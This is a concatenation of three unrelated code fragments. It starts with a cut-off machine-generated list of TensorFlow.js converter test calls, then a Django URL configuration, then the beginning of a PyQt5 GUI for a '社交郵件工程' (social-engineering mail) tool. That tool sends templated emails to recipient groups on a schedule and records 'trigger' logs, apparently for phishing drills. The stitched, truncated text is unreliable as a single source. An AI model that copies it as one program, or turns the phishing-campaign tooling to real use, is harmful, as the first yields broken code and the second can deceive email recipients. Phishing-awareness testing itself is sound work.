tfjs.__version__)"], {}), "('tensorflowjs %s' % tfjs.__version__)\n", (22055, 22093), True, 'import tensorflow as tf\n'), ((22103, 22129), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stdout'], {}), '(stdout)\n', (22121, 22129), True, 'import tensorflow as tf\n'), ((22366, 22394), 'shutil.rmtree', 'shutil.rmtree', (['self._tmp_dir'], {}), '(self._tmp_dir)\n', (22379, 22394), False, 'import shutil\n'), ((22540, 22585), 'tensorflow.keras.layers.Reshape', 'keras.layers.Reshape', (['[2, 3]'], {'input_shape': '[6]'}), '([2, 3], input_shape=[6])\n', (22560, 22585), False, 'from tensorflow import keras\n'), ((22601, 22622), 'tensorflow.keras.layers.LSTM', 'keras.layers.LSTM', (['(10)'], {}), '(10)\n', (22618, 22622), False, 'from tensorflow import keras\n'), ((22638, 22681), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'activation': '"""sigmoid"""'}), "(1, activation='sigmoid')\n", 
(22656, 22681), False, 'from tensorflow import keras\n'), ((22788, 22846), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(6)'], {'input_shape': '[10]', 'activation': '"""relu"""'}), "(6, input_shape=[10], activation='relu')\n", (22806, 22846), False, 'from tensorflow import keras\n'), ((23045, 23071), 'tensorflow.keras.layers.Concatenate', 'keras.layers.Concatenate', ([], {}), '()\n', (23069, 23071), False, 'from tensorflow import keras\n'), ((23098, 23141), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(4)'], {'activation': '"""softmax"""'}), "(4, activation='softmax')\n", (23116, 23141), False, 'from tensorflow import keras\n'), ((23314, 23336), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (23334, 23336), True, 'import tensorflow as tf\n'), ((23348, 23370), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (23363, 23370), True, 'import numpy as np\n'), ((23559, 23618), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (23596, 23618), False, 'from tensorflow import keras\n'), ((23701, 23736), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (23713, 23736), False, 'import os\n'), ((23814, 23933), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\n", (23830, 23933), False, 'import subprocess\n'), ((24057, 24100), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '"""model.json"""'], {}), "(tfjs_output_dir, 'model.json')\n", (24069, 24100), False, 'import os\n'), ((24231, 24271), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""new_h5.h5"""'], {}), "(self._tmp_dir, 'new_h5.h5')\n", (24243, 24271), False, 'import os\n'), ((24288, 24437), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\n new_h5_path])\n", (24304, 24437), False, 'import subprocess\n'), ((24691, 24727), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\n', (24714, 24727), False, 'from tensorflow import keras\n'), ((24902, 24924), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (24922, 24924), True, 'import tensorflow as tf\n'), ((24937, 24958), 'numpy.random.randn', 'np.random.randn', (['(4)', '(8)'], {}), '(4, 8)\n', (24952, 24958), True, 'import numpy as np\n'), ((24970, 24992), 'numpy.random.randn', 'np.random.randn', (['(4)', '(10)'], {}), '(4, 10)\n', (24985, 24992), True, 'import numpy as np\n'), ((25193, 25252), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (25230, 25252), False, 'from tensorflow import keras\n'), ((25335, 25370), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (25347, 25370), False, 'import os\n'), ((25449, 25613), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras_saved_model',\n '--output_format', 'tfjs_layers_model', self._tmp_dir, 
tfjs_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', '--output_format', 'tfjs_layers_model', self.\n _tmp_dir, tfjs_output_dir])\n", (25465, 25613), False, 'import subprocess\n'), ((25742, 25785), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '"""model.json"""'], {}), "(tfjs_output_dir, 'model.json')\n", (25754, 25785), False, 'import os\n'), ((25916, 25956), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""new_h5.h5"""'], {}), "(self._tmp_dir, 'new_h5.h5')\n", (25928, 25956), False, 'import os\n'), ((25973, 26122), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'tfjs_layers_model', '--output_format', 'keras', model_json_path,\n new_h5_path])\n", (25989, 26122), False, 'import subprocess\n'), ((26376, 26412), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\n', (26399, 26412), False, 'from tensorflow import keras\n'), ((26586, 26608), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (26606, 26608), True, 'import tensorflow as tf\n'), ((26620, 26642), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (26635, 26642), True, 'import numpy as np\n'), ((26831, 26890), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (26868, 26890), False, 'from tensorflow import keras\n'), ((26973, 27008), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (26985, 27008), False, 'import os\n'), ((27075, 27236), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras', self._tmp_dir,\n tfjs_output_dir]"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['tensorflowjs_converter', '--input_format', 'keras', self\n ._tmp_dir, tfjs_output_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n", (27091, 27236), False, 'import subprocess\n'), ((27573, 27595), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (27593, 27595), True, 'import tensorflow as tf\n'), ((27607, 27629), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (27622, 27629), True, 'import numpy as np\n'), ((27919, 27978), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (27956, 27978), False, 'from tensorflow import keras\n'), ((28074, 28109), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (28086, 28109), False, 'import os\n'), ((28187, 28306), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\n", (28203, 28306), False, 'import subprocess\n'), ((28674, 28717), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs_sharded"""'], {}), "(self._tmp_dir, 'tfjs_sharded')\n", (28686, 28717), False, 'import os\n'), ((29738, 29778), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""new_h5.h5"""'], {}), "(self._tmp_dir, 'new_h5.h5')\n", (29750, 29778), False, 'import os\n'), ((30076, 30098), 
'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (30096, 30098), True, 'import tensorflow as tf\n'), ((30212, 30248), 'tensorflow.keras.models.load_model', 'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\n', (30235, 30248), False, 'from tensorflow import keras\n'), ((30411, 30433), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (30431, 30433), True, 'import tensorflow as tf\n'), ((30445, 30467), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\n', (30460, 30467), True, 'import numpy as np\n'), ((30757, 30816), 'tensorflow.keras.experimental.export_saved_model', 'keras.experimental.export_saved_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\n', (30794, 30816), False, 'from tensorflow import keras\n'), ((30912, 30947), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs"""'], {}), "(self._tmp_dir, 'tfjs')\n", (30924, 30947), False, 'import os\n'), ((31025, 31144), 'subprocess.Popen', 'subprocess.Popen', (["['tensorflowjs_converter', '--input_format', 'keras_saved_model', self.\n _tmp_dir, tfjs_output_dir]"], {}), "(['tensorflowjs_converter', '--input_format',\n 'keras_saved_model', self._tmp_dir, tfjs_output_dir])\n", (31041, 31144), False, 'import subprocess\n'), ((31516, 31559), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""tfjs_sharded"""'], {}), "(self._tmp_dir, 'tfjs_sharded')\n", (31528, 31559), False, 'import os\n'), ((32140, 32172), 'os.path.getsize', 'os.path.getsize', (['weight_files[0]'], {}), '(weight_files[0])\n', (32155, 32172), False, 'import os\n'), ((32487, 32545), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(10)'], {'activation': '"""relu"""', 'input_shape': '[4]'}), "(10, activation='relu', input_shape=[4])\n", (32505, 32545), False, 'from tensorflow import keras\n'), ((32561, 32604), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'activation': '"""sigmoid"""'}), "(1, activation='sigmoid')\n", (32579, 32604), False, 'from tensorflow import keras\n'), ((3047, 3069), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\n', (3067, 3069), True, 'import tensorflow as tf\n'), ((5716, 5741), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (5731, 5741), False, 'import os\n'), ((6550, 6562), 'json.load', 'json.load', (['f'], {}), '(f)\n', (6559, 6562), False, 'import json\n'), ((8426, 8467), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (8438, 8467), False, 'import os\n'), ((8917, 8956), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""group*-*"""'], {}), "(self._tmp_dir, 'group*-*')\n", (8929, 8956), False, 'import os\n'), ((9901, 9940), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""'], {}), "(self._tmp_dir, 'keras_h5')\n", (9913, 9940), False, 'import os\n'), ((10416, 10428), 'json.load', 'json.load', (['f'], {}), '(f)\n', (10425, 10428), False, 'import json\n'), ((12334, 12373), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""keras_h5"""'], {}), "(self._tmp_dir, 'keras_h5')\n", (12346, 12373), False, 'import os\n'), ((12877, 12889), 'json.load', 'json.load', (['f'], {}), '(f)\n', (12886, 12889), False, 'import json\n'), ((14813, 14850), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""foo.h5"""'], {}), "(self._tmp_dir, 'foo.h5')\n", (14825, 14850), False, 'import os\n'), ((14864, 14901), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""output"""'], {}), 
"(self._tmp_dir, 'output')\n", (14876, 14901), False, 'import os\n'), ((15780, 15818), 'os.path.join', 'os.path.join', (['output_dir', '"""model.json"""'], {}), "(output_dir, 'model.json')\n", (15792, 15818), False, 'import os\n'), ((15969, 16005), 'os.path.join', 'os.path.join', (['output_dir', '"""group*-*"""'], {}), "(output_dir, 'group*-*')\n", (15981, 16005), False, 'import os\n'), ((16612, 16650), 'os.path.join', 'os.path.join', (['output_dir', '"""model.json"""'], {}), "(output_dir, 'model.json')\n", (16624, 16650), False, 'import os\n'), ((16801, 16837), 'os.path.join', 'os.path.join', (['output_dir', '"""group*-*"""'], {}), "(output_dir, 'group*-*')\n", (16813, 16837), False, 'import os\n'), ((17506, 17544), 'os.path.join', 'os.path.join', (['output_dir', '"""model.json"""'], {}), "(output_dir, 'model.json')\n", (17518, 17544), False, 'import os\n'), ((18223, 18259), 'os.path.join', 'os.path.join', (['output_dir', '"""group*-*"""'], {}), "(output_dir, 'group*-*')\n", (18235, 18259), False, 'import os\n'), ((18865, 18903), 'os.path.join', 'os.path.join', (['output_dir', '"""model.json"""'], {}), "(output_dir, 'model.json')\n", (18877, 18903), False, 'import os\n'), ((19054, 19090), 'os.path.join', 'os.path.join', (['output_dir', '"""group*-*"""'], {}), "(output_dir, 'group*-*')\n", (19066, 19090), False, 'import os\n'), ((20017, 20058), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (20029, 20058), False, 'import os\n'), ((21284, 21325), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (21296, 21325), False, 'import os\n'), ((24123, 24154), 'os.path.isfile', 'os.path.isfile', (['model_json_path'], {}), '(model_json_path)\n', (24137, 24154), False, 'import os\n'), ((24548, 24575), 'os.path.isfile', 'os.path.isfile', (['new_h5_path'], {}), '(new_h5_path)\n', (24562, 24575), False, 'import os\n'), ((25808, 25839), 'os.path.isfile', 'os.path.isfile', (['model_json_path'], {}), '(model_json_path)\n', (25822, 25839), False, 'import os\n'), ((26233, 26260), 'os.path.isfile', 'os.path.isfile', (['new_h5_path'], {}), '(new_h5_path)\n', (26247, 26260), False, 'import os\n'), ((27452, 27478), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\n', (27470, 27478), True, 'import tensorflow as tf\n'), ((29332, 29350), 'os.path.getsize', 'os.path.getsize', (['f'], {}), '(f)\n', (29347, 29350), False, 'import os\n'), ((33392, 33443), 'os.path.join', 'os.path.join', (['layers_model_output_dir', '"""model.json"""'], {}), "(layers_model_output_dir, 'model.json')\n", (33404, 33443), False, 'import os\n'), ((33634, 33677), 'os.path.join', 'os.path.join', (['graph_model_dir', '"""model.json"""'], {}), "(graph_model_dir, 'model.json')\n", (33646, 33677), False, 'import os\n'), ((33725, 33768), 'os.path.join', 'os.path.join', (['graph_model_dir', '"""group*.bin"""'], {}), "(graph_model_dir, 'group*.bin')\n", (33737, 33768), False, 'import os\n'), ((6478, 6519), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (6490, 6519), False, 'import os\n'), ((8014, 8024), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (8022, 8024), True, 'import tensorflow as tf\n'), ((8273, 8283), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (8281, 8283), True, 'import tensorflow as tf\n'), ((9794, 9804), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (9802, 9804), True, 'import tensorflow as tf\n'), 
((10338, 10379), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (10350, 10379), False, 'import os\n'), ((12227, 12237), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (12235, 12237), True, 'import tensorflow as tf\n'), ((12799, 12840), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""model.json"""'], {}), "(self._tmp_dir, 'model.json')\n", (12811, 12840), False, 'import os\n'), ((19344, 19354), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (19352, 19354), True, 'import tensorflow as tf\n'), ((20252, 20262), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (20260, 20262), True, 'import tensorflow as tf\n'), ((20693, 20703), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (20701, 20703), True, 'import tensorflow as tf\n'), ((21175, 21185), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (21183, 21185), True, 'import tensorflow as tf\n'), ((23289, 23299), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (23297, 23299), True, 'import tensorflow as tf\n'), ((24877, 24887), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (24885, 24887), True, 'import tensorflow as tf\n'), ((26561, 26571), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (26569, 26571), True, 'import tensorflow as tf\n'), ((27548, 27558), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (27556, 27558), True, 'import tensorflow as tf\n'), ((28957, 29000), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '"""model.json"""'], {}), "(tfjs_output_dir, 'model.json')\n", (28969, 29000), False, 'import os\n'), ((29212, 29257), 'os.path.join', 'os.path.join', (['sharded_model_dir', '"""group*.bin"""'], {}), "(sharded_model_dir, 'group*.bin')\n", (29224, 29257), False, 'import os\n'), ((29899, 29944), 'os.path.join', 'os.path.join', (['sharded_model_dir', '"""model.json"""'], {}), "(sharded_model_dir, 'model.json')\n", (29911, 29944), False, 'import os\n'), ((30051, 30061), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (30059, 30061), True, 'import tensorflow as tf\n'), ((30386, 30396), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (30394, 30396), True, 'import tensorflow as tf\n'), ((31769, 31812), 'os.path.join', 'os.path.join', (['tfjs_output_dir', '"""model.json"""'], {}), "(tfjs_output_dir, 'model.json')\n", (31781, 31812), False, 'import os\n'), ((32022, 32067), 'os.path.join', 'os.path.join', (['sharded_model_dir', '"""group*.bin"""'], {}), "(sharded_model_dir, 'group*.bin')\n", (32034, 32067), False, 'import os\n'), ((12110, 12147), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""group*"""'], {}), "(self._tmp_dir, 'group*')\n", (12122, 12147), False, 'import os\n'), ((14555, 14592), 'os.path.join', 'os.path.join', (['self._tmp_dir', '"""group*"""'], {}), "(self._tmp_dir, 'group*')\n", (14567, 14592), False, 'import os\n'), ((27879, 27889), 'numpy.size', 'np.size', (['w'], {}), '(w)\n', (27886, 27889), True, 'import numpy as np\n'), ((30717, 30727), 'numpy.size', 'np.size', (['w'], {}), '(w)\n', (30724, 30727), True, 'import numpy as np\n'), ((3345, 3461), 'tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def', 'tf.compat.v1.saved_model.signature_def_utils.predict_signature_def', ([], {'inputs': "{'x': x}", 'outputs': "{'output': output}"}), "(inputs={\n 'x': x}, outputs={'output': output})\n", (3411, 3461), True, 'import tensorflow as tf\n')] |
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path, include, re_path
from django.views.generic import TemplateView
urlpatterns = [
path('api-auth/', include('rest_framework.urls')),
path('rest-auth/', include('rest_auth.urls')),
path('rest-auth/registration/', include('rest_auth.registration.urls')),
path('admin/', admin.site.urls),
path('api/', include('core.api.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
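# In production, let the front-end single-page app handle any route Django does not match.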
if not settings.DEBUG:
urlpatterns += [re_path(r'^.*',
TemplateView.as_view(template_name='index.html'))]
| [
"django.conf.urls.static.static",
"django.views.generic.TemplateView.as_view",
"django.urls.path",
"django.urls.include"
] | [((406, 437), 'django.urls.path', 'path', (['"""admin/"""', 'admin.site.urls'], {}), "('admin/', admin.site.urls)\n", (410, 437), False, 'from django.urls import path, include, re_path\n'), ((524, 585), 'django.conf.urls.static.static', 'static', (['settings.MEDIA_URL'], {'document_root': 'settings.MEDIA_ROOT'}), '(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n', (530, 585), False, 'from django.conf.urls.static import static\n'), ((241, 271), 'django.urls.include', 'include', (['"""rest_framework.urls"""'], {}), "('rest_framework.urls')\n", (248, 271), False, 'from django.urls import path, include, re_path\n'), ((297, 322), 'django.urls.include', 'include', (['"""rest_auth.urls"""'], {}), "('rest_auth.urls')\n", (304, 322), False, 'from django.urls import path, include, re_path\n'), ((361, 399), 'django.urls.include', 'include', (['"""rest_auth.registration.urls"""'], {}), "('rest_auth.registration.urls')\n", (368, 399), False, 'from django.urls import path, include, re_path\n'), ((456, 480), 'django.urls.include', 'include', (['"""core.api.urls"""'], {}), "('core.api.urls')\n", (463, 480), False, 'from django.urls import path, include, re_path\n'), ((701, 749), 'django.views.generic.TemplateView.as_view', 'TemplateView.as_view', ([], {'template_name': '"""index.html"""'}), "(template_name='index.html')\n", (721, 749), False, 'from django.views.generic import TemplateView\n')] |
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# All of the basic widgets are imported here
from PyQt5.QtWebEngineWidgets import QWebEngineView
from PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog,
QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit,
QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView)
from PyQt5.QtGui import QPalette, QColor, QBrush
from PyQt5.QtCore import Qt, QDateTime
from pyqtgraph import GraphicsLayoutWidget, setConfigOption, setConfigOptions
import qdarkstyle, sys
import mylibrary.genmail as gm
from GenAndSendMail import insert_send_mail
from server.database import Database
from server.sendmail import Smtp
from server.client import Client
from email import generator
from pandas import DataFrame
from copy import deepcopy
class SubWindow(QWidget):
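    """Small popup window for sending a test mail to a single recipient."""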
def __init__(self):
super().__init__()
self.resize(400,100)
self.main_layout = QGridLayout()
self.setLayout(self.main_layout)
self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
self.main_layout.addWidget(QLabel('收件人'), 0, 0, 1, 1)
self.in_recipient = QLineEdit()
self.main_layout.addWidget(self.in_recipient, 0, 1, 1, 5)
self.btn_send = QPushButton('寄送')
self.main_layout.addWidget(self.btn_send, 1, 5, 1, 1)
class MailserverUi(QMainWindow):
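    """Main window of the social-engineering mail tool: mail-out, SMTP/database settings, template editing, and trigger logs."""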
def __init__(self):
super().__init__()
setConfigOption('background', '#19232D')
setConfigOption('foreground', 'd')
setConfigOptions(antialias = True)
# self.resize(720,500)
self.init_ui()
self.data_smtp = []
self.data_db = []
self.data_logs = []
self.data_temp_logs = []
# self.sub_win = SubWindow()
        # Default status bar
self.status = self.statusBar()
self.status.showMessage("開發者: 鄭鈺城, 聯絡資訊: <EMAIL>")
        # Title bar
self.setWindowTitle("社交郵件工程")
        self.setWindowOpacity(1) # window opacity
self.main_layout.setSpacing(0)
self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())
self.main_widget.setStyleSheet(
"""
QComboBox::item:checked {
height: 12px;
border: 1px solid #32414B;
margin-top: 0px;
margin-bottom: 0px;
padding: 4px;
padding-left: 0px;
}
"""
)
def init_ui(self):
        # Create the main widget of the window
self.main_widget = QWidget()
        # Create the grid layout for the main widget
self.main_layout = QGridLayout()
        # Use the grid layout as the main widget's layout
self.main_widget.setLayout(self.main_layout)
        # Create the left-side widget
self.left_widget = QWidget()
self.left_widget.setObjectName('left_widget')
self.left_layout = QGridLayout()
self.left_widget.setLayout(self.left_layout)
        # Create the right-side widget
self.right_widget = QWidget()
self.right_widget.setObjectName('right_widget')
self.right_layout = QGridLayout()
self.right_widget.setLayout(self.right_layout)
        # Left widget at row 0, column 0, spanning 12 rows and 3 columns
self.main_layout.addWidget(self.left_widget, 0, 0, 12, 3)
        # Right widget at row 0, column 3, spanning 12 rows and 8 columns
self.main_layout.addWidget(self.right_widget, 0, 3, 12, 8)
        # Set the central widget of the window
self.setCentralWidget(self.main_widget)
        # Main function buttons
self.btn_sendmail = QPushButton("發送信件")
self.btn_sendmail.clicked.connect(self.display_send_mail)
self.btn_smtp = QPushButton("系統設定")
self.btn_smtp.clicked.connect(self.display_smtp_setting)
self.btn_db = QPushButton("資料庫設定")
self.btn_db.clicked.connect(self.display_db_setting)
self.btn_update_eml = QPushButton("修改樣板")
self.btn_update_eml.clicked.connect(self.display_update_eml)
        self.btn_get_logs = QPushButton("觸發明細")
self.btn_get_logs.clicked.connect(self.display_logs)
self.btn_download_logs = QPushButton("下載觸發明細")
self.btn_download_logs.clicked.connect(self.logs_download)
self.quit_btn = QPushButton("退出")
self.quit_btn.clicked.connect(self.quit_act)
self.left_layout.addWidget(self.btn_sendmail, 2, 0, 1, 3)
self.left_layout.addWidget(self.btn_smtp, 3, 0, 1, 3)
self.left_layout.addWidget(self.btn_db, 4, 0, 1, 3)
self.left_layout.addWidget(self.btn_update_eml, 5, 0, 1, 3)
self.left_layout.addWidget(self.btn_get_logs, 6, 0, 1, 3)
self.left_layout.addWidget(self.btn_download_logs, 7, 0, 1, 3)
self.left_layout.addWidget(self.quit_btn, 8, 0, 1, 3)
        # Main function: query input
self.in_data = QLineEdit()
self.in_data.setPlaceholderText("暫無")
self.left_layout.addWidget(self.in_data, 1, 0, 1, 3)
        # Main function: log table
self.query_result = QTableWidget()
self.left_layout.addWidget(self.query_result, 9, 0, 2, 3)
self.query_result.verticalHeader().setVisible(False)
self.right_display = GraphicsLayoutWidget()
self.right_layout.addWidget(self.right_display, 0, 3, 12, 8)
        # Right-side widgets: send mail
self.in_eml_type = QLineEdit()
self.in_eml_template = QLineEdit()
self.btn_eml_browse = QPushButton('瀏覽')
self.btn_eml_browse.clicked.connect(lambda: self.open_eml(self.in_eml_template))
self.in_recipient_group = QLineEdit()
self.in_recipient_excel = QLineEdit()
self.btn_recipient_browse = QPushButton('瀏覽')
self.btn_recipient_browse.clicked.connect(lambda: self.open_excel(self.in_recipient_excel))
self.in_annex_file = QLineEdit()
self.btn_annex_file = QPushButton('瀏覽')
self.btn_annex_file.clicked.connect(lambda: self.open_word(self.in_annex_file))
self.in_scheduler = QDateTimeEdit(QDateTime.currentDateTime())
self.in_scheduler.setCalendarPopup(True)
self.in_scheduler.setDisplayFormat('yyyy-MM-dd hh:mm')
self.cb_scheduler = QCheckBox('使用')
self.btn_sendmail_start = QPushButton('執行')
self.btn_sendmail_start.clicked.connect(self.send_mail)
        # Right-side widgets: SMTP settings
self.in_smtp_host = QLineEdit()
self.in_smtp_port = QLineEdit()
self.in_smtp_user = QLineEdit()
self.in_smtp_password = QLineEdit()
self.cb_smtp_ssl = QCheckBox('使用')
self.in_smtp_test = QLineEdit()
self.btn_smtp_save = QPushButton('儲存')
self.btn_smtp_save.clicked.connect(lambda: self.save_data(self.data_smtp))
self.btn_smtp_test = QPushButton('測試')
self.btn_smtp_test.clicked.connect(self.show_sub_win)
        # Right-side widgets: database settings
self.in_db_host = QLineEdit()
self.in_db_port = QLineEdit()
self.in_db_user = QLineEdit()
self.in_db_password = QLineEdit()
self.in_db_database = QLineEdit()
self.in_db_domain = QLineEdit()
self.in_db_domain.setPlaceholderText('回收風險資訊動作的網址')
self.btn_db_save = QPushButton('儲存')
self.btn_db_save.clicked.connect(lambda: self.save_data(self.data_db))
        # Right-side widgets: edit EML template
self.in_edit_sender = QLineEdit()
self.in_edit_sender_name = QLineEdit()
self.cb_edit_annex = QCheckBox('是')
self.in_edit_annex = QLineEdit()
self.btn_edit_annex = QPushButton('瀏覽')
self.btn_edit_annex.clicked.connect(lambda: self.open_annex(self.in_edit_annex))
self.in_edit_subject = QLineEdit()
self.mail_tab = QTabWidget()
self.mail_tab.setDocumentMode(True)
self.mail_tab.currentChanged.connect(self.print_html)
self.mail_tab_1 = QWidget()
self.mail_tab_2 = QWidget()
self.mail_tab.addTab(self.mail_tab_1, 'Html')
self.mail_tab.addTab(self.mail_tab_2, 'Web')
self.tab_1 = QGridLayout()
self.tab_2 = QGridLayout()
self.tab_1.setContentsMargins(0,0,0,0)
self.tab_2.setContentsMargins(0,0,0,0)
self.mail_tab_1.setLayout(self.tab_1)
self.mail_tab_2.setLayout(self.tab_2)
self.in_edit_html = QTextEdit()
self.in_edit_web = QWebEngineView()
self.tab_1.addWidget(self.in_edit_html, 1, 1, 1, 1)
self.tab_2.addWidget(self.in_edit_web, 1, 1, 1, 1)
self.btn_edit_eml_reset = QPushButton('清除')
self.btn_edit_eml_reset.clicked.connect(self.eml_reset)
self.btn_edit_eml_read = QPushButton('讀取')
self.btn_edit_eml_read.clicked.connect(self.eml_open)
self.btn_edit_eml_save = QPushButton('儲存')
self.btn_edit_eml_save.clicked.connect(self.eml_save)
        # Right-side widgets: logs
self.tbw_logs = QTableWidget()
self.tbw_logs.verticalHeader().setVisible(False)
self.cmb_logs_choice = QComboBox()
self.in_logs_data = QLineEdit()
self.in_logs_data.setPlaceholderText("輸入資料")
self.btn_logs_search = QPushButton('執行')
self.btn_logs_search.clicked.connect(self.logs_change)
def display_send_mail(self):
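        # Build the right-side form for composing a mail-out: template, recipient group/Excel, attachment, and optional schedule.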
self.clear_layout(self.right_layout)
labels = [ "信件類型 :", "信件模板 :", " 收件人群組 :", "收件人資料 :", '附件資料 :',"設定排程 :"]
for i, label in enumerate(labels):
self.right_layout.addWidget(QLabel(label), i, 3, 1, 1, Qt.AlignRight)
self.right_layout.addWidget(self.in_eml_type, 0, 4, 1, 7)
self.right_layout.addWidget(self.in_eml_template, 1, 4, 1, 6)
self.right_layout.addWidget(self.btn_eml_browse, 1, 10, 1, 1)
self.right_layout.addWidget(self.in_recipient_group, 2, 4, 1, 7)
